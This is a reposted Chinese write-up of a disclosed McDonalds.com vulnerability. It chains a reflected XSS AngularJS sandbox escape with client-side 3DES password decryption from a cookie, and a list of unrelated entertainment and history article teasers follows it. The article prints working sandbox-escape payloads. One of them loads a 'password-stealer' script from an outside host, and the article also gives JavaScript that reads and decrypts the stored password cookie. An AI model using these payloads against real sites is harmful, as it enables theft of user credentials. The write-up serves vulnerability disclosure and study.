今日看点

重磅:利用麦当劳网站的漏洞获取用户密码

发表于话题:大学生利用漏洞免费吃肯德基获刑
发布时间:2021-05-12

导读 本文讲述了利用不安全的加密存储(Insecure_Cryptographic_Storage)漏洞和服务端反射型XSS漏洞,实现对麦当劳网站(McDonalds.com)注册用户的密码窃取,进一步测试,还可能获取到网站注册用户的更多信息。

POC-利用反射型XSS漏洞绕过AngularJS框架沙箱

麦当劳网站McDonalds.com设置有一个搜索页面,该页面存在XSS反射型漏洞,可以返回搜索参数值,假设搜索参数q为***********-test-reflected-test-***********,对应链接:
https://www.mcdonalds.com/us/en-us/search-results.html?q=***********-test-reflected-test-***********

则执行效果如下:

麦当劳网站采用AngularJS框架,所以可以使用特殊字符在搜索区域进行返回值尝试。通过更改搜索参数q为{{$id}}之后,发现返回值对应AngularJS范围内的对应ID数字9:

Link used: https://www.mcdonalds.com/us/en-us/search-results.html?q={{$id}}

AngularJS是一个流行的JavaScript框架,通过这个框架可以把表达式放在花括号中嵌入到页面中。例如,表达式1+2={{1+2}}将会得到1+2=3。其中括号中的表达式被执行了,这就意味着,如果服务端允许用户输入的参数中带有花括号,我们就可以用Angular表达式来进行xss攻击。

由于AngularJS工作在沙箱模式,所以使用参数{{alert(1)}}无任何返回信息,但这并不代表AngularJS沙箱没有漏洞。在 AngularJS1.6版本中,由于沙箱机制不能很好地起到安全防护目的,已经被从源码中移除。而PortSwigger还对AngularJS的各版本沙箱进行了绕过测试,并给出了相应绕过执行命令。

在这里,我们来看看McDonalds.com使用的AngularJS版本,通过在浏览器控制端输入angular.version命令:

可以发现AngularJS为1.5.3版本,参照PortSwigger的测试,我们选用

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}

作为搜索参数,很惊喜,返回值如下:

这就意味着,我们可以利用绕过命令,对网站加载外部JS脚本文件,如构造如下命令:

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=$.getScript(`https://finnwea.com/snippets/external-alert.js`)');}}`

在内容安全策略(Content-Security-Policy)的提示下,第三方脚本文件被成功加载。

窃取密码

除此之外,我在麦当劳网站的注册页面发现了复选框“Remember my password”,通常来说,这只有在用户登录页面才存在,有点奇怪:

在该页面的源代码页面,包含了各种passowrd字段内容,甚至存在一个有趣的密码解密函数:

最危险的是,利用该解密函数代码竟然可以实现对客户端或双向加密存储的密码破解。尝试对发现的被存储Cookie值penc进行解密,竟然成功了!

而且,经分析发现,Cookie值penc的存储期限是大大的一年!LOL!

另外,以下的源码分析显示,麦当劳网站使用了Javascript的CryptoJS加密库进行信息加密,加密方式为3DES,其中加密参数key和iv都为通用,这意味着只需要获取到cookie值就能对密码解密:

由于AngularJS沙箱绕过方法只对charAt的join方法(charAt=[].join;$eval(‘x=alert(1)’))有效,所以即使我曾尝试在搜索区域构造其它恶意命令对cookie信息进行解密,但最终总是因为getCookie失败而无效。只有当charAt(0) 不为空时,getCookie才有返回值:

最后,我写了一段调用麦当劳网站首页框架进行cookie窃取的脚本,为了避免脚本因AngularJS沙箱被绕过而被反复执行,所以,我用window.xssIsExecuted对其进行了显示控制,如下:

if (!window.xssIsExecuted) { window.xssIsExecuted = true; var iframe = $('网址'>'); $('body').append(iframe); iframe.on('load', function() { var penc = iframe[0].contentWindow.getCookie('penc'); alert(iframe[0].contentWindow.decrypt(penc)); }); }

最终,配合以下AngularJS沙箱绕过命令,可以成功从cookie信息中对密码解密!

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=$.getScript(`https://finnwea.com/snippets/mcdonalds-password-stealer.js`)');}}

遗憾的是,我曾多次与麦当劳官方就此问题进行联系,但是他们竟然都不回应!@#%¥&! ,所以我选择把此漏洞公开。

原文来自:http://www.tiejiang.org/16067.html

本文地址:http://www.linuxprobe.com/mcdonald-vulnerability-password.html

标签组:[麦当劳] [漏洞] [沙箱] [cookie] [angular

本文来源:https://www.kandian5.com/articles/12532.html

相关阅读

《魅影神捕》开机 罗云熙“清冷双面弃子”试炼人性灰度

6月13日,由爱奇艺出品、北京战友文化联合出品及承制、中视同成联合承制、爱奇艺爱撒糖工作室联合打造的古装悬疑探案剧《魅影神捕》在横店举行开机仪式。该剧由龚宇、原昕担任出品人,王晓晖担任总监制,邵文...

2025-06-14

齐桓公称霸天下的多维密码:地理、改革与战略的完美融合

齐桓公(前685年-前643年在位)作为春秋五霸之首,其称霸之路绝非偶然。从地理优势到制度革新,从人才选拔到外交策略,齐桓公的霸业是多重因素交织的结果。 一、地理优势:资源禀赋奠定物质基础 齐国地...

2025-06-14

新加坡演员孙政双线出击!《微笑一号店》展暖男本色《临江仙》塑冷酷龙渊

近期,新加坡演员孙政以截然不同的形象活跃于中国观众的视野,在热播的经营纪实互动真人秀综艺《微笑一号店》中,孙政是笑容温暖、阳光清爽的甜品学员;而在同期上线的仙侠剧《临江仙》里,孙政则化身气场迫人、神情...

2025-06-14

秦武王之后:秦昭襄王的崛起与秦国霸业的转折

秦武王嬴荡在位仅四年,便因“举鼎绝膑”的意外事件殒命,其短暂统治如流星划过秦国崛起的历史长空。然而,这位以“勇力”著称的君主之死,却意外成为秦国政治格局剧变的导火索。他的离世不仅揭开秦国高层权力斗争的...

2025-06-14

SEVENTEEN为日韩合拍剧《初恋DOGs》献唱主题曲《Where love passed》

6月13日,据韩媒消息,组合SEVENTEEN为日韩合拍剧《初恋DOGs》献唱主题曲《Where love passed》,成员WOOZI亲自作词作曲。13日,所属社PLEDIS表示:“...

2025-06-14

秦始皇可能活在地宫吗?历史、科学与传说的三重解构

在骊山北麓的苍茫雾霭中,秦始皇陵地宫如同一部未解的密码,千百年来引发无数猜想。从“以水银为百川江河”的《史记》记载,到现代考古探测到的“强汞异常”,这座地下帝国始终笼罩着神秘色彩。然而,当我们将“秦始...

2025-06-14

防弹少年团田柾国就帽子争议进行道歉 今后将谨慎注意

防弹少年团田柾国因佩戴了印有疑似涉及日本右翼字句的帽子引发争议,随后在Weverse公开致歉。14日凌晨,田柾国在Weverse发文表示:"因在彩排过程中佩戴了一顶印有特定字句的帽子,令许多粉丝感到...

2025-06-14

泰山封禅在哪里举行:揭秘中国古代帝王与泰山的神圣对话

在中国古代帝王的心目中,泰山绝非一座普通的山岳,而是“天人合一”的神圣象征。自秦始皇起,历代帝王封禅泰山的传统延续千年,这一仪式不仅是对泰山地理高度的征服,更是对精神权威的终极宣告。然而,泰山封禅究竟...

2025-06-14

相叶雅纪迎来第二个孩子 2021年与妻子结婚

据日媒报道表示,岚成员相叶雅纪的第二个孩子已经出生,这一消息在《女性Seven》的采访中得到证实,网友们也纷纷祝福相叶雅纪。现在岚5位成员中有3位已经结婚,3位成员都有了孩子。二宫和也有2个孩子,樱...

2025-06-14

嬴驷与秦始皇:跨越百年的帝国奠基之路

在秦国统一天下的历史长卷中,嬴驷(秦惠文王)与嬴政(秦始皇)的名字犹如两座巍峨的丰碑,相隔百年却血脉相连。这位高祖父与玄孙的传承关系,不仅是简单的家族谱系延续,更是秦国从“偏居西陲”到“横扫六合”的战...

2025-06-14